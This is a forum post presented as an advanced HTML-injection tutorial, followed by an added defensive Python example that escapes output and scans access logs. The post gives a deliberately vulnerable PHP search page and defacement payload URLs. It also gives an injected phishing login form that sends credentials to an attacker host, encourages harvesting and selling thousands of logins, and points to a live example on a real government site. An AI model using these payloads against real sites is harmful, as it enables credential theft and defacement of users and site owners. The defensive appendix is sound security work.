MERLINIANO
Member
Making it clear that this is an advanced tutorial!
If you do not understand programming, first learn a language.
Python is the indicated language.
[0x01] HTML Injection:
Hypertext Markup Language (HTML) injection, also known as "virtual defacement", is an attack on an application where the user is allowed to inject HTML code into the web application through user input fields. When the web application is not able to properly handle requests from users, an attacker can supply his own valid HTML code via a parameter value and get the application to validate the request to the server. Sometimes HTML injection is also referred to as XSS HTML injection, because the two attacks are essentially the same thing, but with an XSS attack you are sending JavaScript and script tags as an attack vector, whereas in HTML injection you are using simple HTML tags to modify the page.
[0x02] Just Defacing?
Okay, so in the hacker community many people underestimate the true danger of HTML injection. Also, attackers don't leverage the attack to its full potential, rather than just editing the content of a page to say "I hacked you!". No, defacing is just the tip of the iceberg here. HTML injection can lead to malicious pages being created that may contain a hidden Java drive-by, phishing, distributed DDoS attacks that are Java based and run through the browser, distributed cracking attacks that go on through your browser as you're browsing the malicious site, cross-site scripting, hidden browser exploits, BeEF networks, hidden malware, bitcoin mining, and much, much more. These are just some of the things that attackers never even think about doing, because most are just unaware of how dangerous this attack can be. Scenario of this attack being leveraged correctly:
[*]Attacker finds an HTML injection vulnerability on a social network site.
[*]Attacker crafts a malicious link containing his HTML code, encodes it, and sends it to users.
[*]User visits the page, due to the domain being trusted.
[*]User visits the encoded link unaware; the link redirects to a login page (a phishing page that was crafted by the attacker).
[*]User enters credentials and the attacker grabs the login info.
[*]Attacker now has the potential to nab thousands of logins, sell them to spammers, use the passwords as word lists for effective cracking, and get a lot of rep.
[0x03] The Attack:
Vulnerable Application Code:
<?php
// The value is taken straight from the request and never validated or escaped.
$username = $_REQUEST['username'];
?>
<html>
<head>
<title>member search</title>
</head>
<body>
<h1>Welcome to CHF!</h1>
<br>
<!-- Injection point: the raw parameter is echoed into the page -->
Searching For <?php echo $username; ?>!
</body>
</html>
[*]Sorry for the poor code, I didn't add a user input field, but let's just imagine that there is a search box there used to enter a user name to search. So in the input field I enter "DES". The URL would look like this after I press the search button.
Code:
http://www.chf.com/membersearch.php?username=DES
[*]Let's look at our code. The page is called membersearch.php; it requests the parameter 'username', so that's why the URL has ?username=, and whatever is entered in your input field is set as the $username variable, then echoed (printed) back onto the page. So after my search for DES, the page should say "Searching for DES!". This is good, this means that whatever is entered into our input field and set as the $username variable is printed onto the page. So how about trying to enter HTML code after our ?username= and seeing if the server validates it.
Code:
http://www.chf.com/m...r><br><b>Hackedby DES</b>
[*]This will start two new lines, and our page will now show, in bold letters:
Code:
Searching for
Hacked by DES!
[0x04] Phishing Example:
Say in the above example I wanted to phish accounts. Well, I would have to craft a link that will render the injected HTML, present a login form, and then comment out the rest of the page after the injection point with a <!-- to make it look a bit legit.
Code:
http://www.chf.com/m...name=<h3>PleaseEnter Your Username and Password to Proceed:</h3><form method="POST"
action="http://DES-phish.com....txt">Username:<input type="text" name="username" /><br />Password: <input type="password"
name="password" /><br /><input type="submit" value="Login" /></form><!--
[*]So now I encode this link, shorten it, and then send it around the forum or web page to users. Then, when usernames and passwords are submitted to my phishing link, the values are sent to http://DES-phish.com/login.txt via POST and logged.
[0x05] Persistent and NON Persistent:
Just like XSS, HTML injection can be persistent and non-persistent, persistent HTML injection being very rare. Persistent HTML injection is achieved the same way persistent XSS is: by being able to submit your malicious code into the web page, rather than it just being stored in a link. This can be possible, say, in many guest books, or in places where you can leave a comment on a post or whatever. Just make sure that page is vulnerable, and send your malicious HTML code as a comment or post. Then all people have to do is visit the link, and you can do phishing more effectively or have users see your defacement, or whatever you use this attack for.
[0x06] Live Example:
HTML injection on the National Geophysical Data Center. Even large sites are vulnerable to this attack. (Also vulnerable to XSS & SQLi on the same parameter.)
Code:
http://www.ngdc.noaa...=<b>DES@CHF</b>
Do not trust, Check.
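The following is an added example and is not code from the post above or from its author. It gives the defensive counterpart to the membersearch.php page: a Python stand-in for the PHP echo that shows the unescaped output beside the hardened, HTML-escaped form, and a check over web-server access-log lines that flags requests whose username parameter carries HTML tags or the <!-- comment opener the post uses to hide the rest of the page. The log lines, IP addresses, timestamps and the example.invalid host are all constructed for the example; the function names are my own.

```python
"""Added example, not part of the original post.

Defensive counterparts to the tutorial's membersearch.php page:
  1. render_safe() is the fix for the raw echo: HTML-escape the parameter.
  2. flag_html_in_param() scans access-log lines for requests whose
     'username' parameter contains markup (tags or a comment opener).
All log lines, addresses and the example.invalid host are constructed.
"""
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit


def render_vulnerable(username: str) -> str:
    """Mirror of the tutorial's PHP: the parameter is echoed verbatim."""
    return f"Searching For {username}!"


def render_safe(username: str) -> str:
    """Hardened form for a text-node context: html.escape() turns
    < > & " ' into entities, so injected markup is displayed, not parsed."""
    return f"Searching For {html.escape(username, quote=True)}!"


# Constructed access-log lines in common log format (not real traffic).
# Line 3 is percent-encoded twice, as the post suggests encoding the link.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /membersearch.php?username=DES HTTP/1.1" 200 512
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /membersearch.php?username=%3Cbr%3E%3Cb%3EHacked%20by%20DES%3C/b%3E HTTP/1.1" 200 530
203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "GET /membersearch.php?username=%253Cform%2520action%253D%2522http://example.invalid/login%2522%253E%253C!-- HTTP/1.1" 200 700
198.51.100.2 - - [10/Oct/2023:13:58:40 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

# client, timestamp, method, request target, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3})')
# A tag opener followed by a letter or '/', or an HTML comment opener.
MARKUP_RE = re.compile(r"<(?:/?[A-Za-z]|!--)")


def flag_html_in_param(log_text: str, param: str = "username") -> list:
    """Return one finding per request whose `param` value contains markup."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, _method, target, status = m.groups()
        parts = urlsplit(target)
        query = parse_qs(parts.query, keep_blank_values=True)
        for raw in query.get(param, []):
            # parse_qs already removed one layer of percent-encoding;
            # unquote() undoes a second layer if the value was double-encoded.
            value = unquote(raw)
            if MARKUP_RE.search(value):
                findings.append({
                    "ip": ip,
                    "time": ts,
                    "path": parts.path,
                    "status": status,
                    "value": value,
                    "comment_opener": "<!--" in value,
                })
    return findings


if __name__ == "__main__":
    print(render_vulnerable("<b>Hacked by DES</b>"))
    print(render_safe("<b>Hacked by DES</b>"))
    for finding in flag_html_in_param(SAMPLE_LOG):
        print(finding)
```

The escaping in render_safe is only correct for a text-node context; a value placed inside an attribute or a script block needs the encoding for that context. The log check is deliberately narrow (one parameter, one page) so that it produces few false positives on a real log; the same pattern applies to any parameter the page reflects.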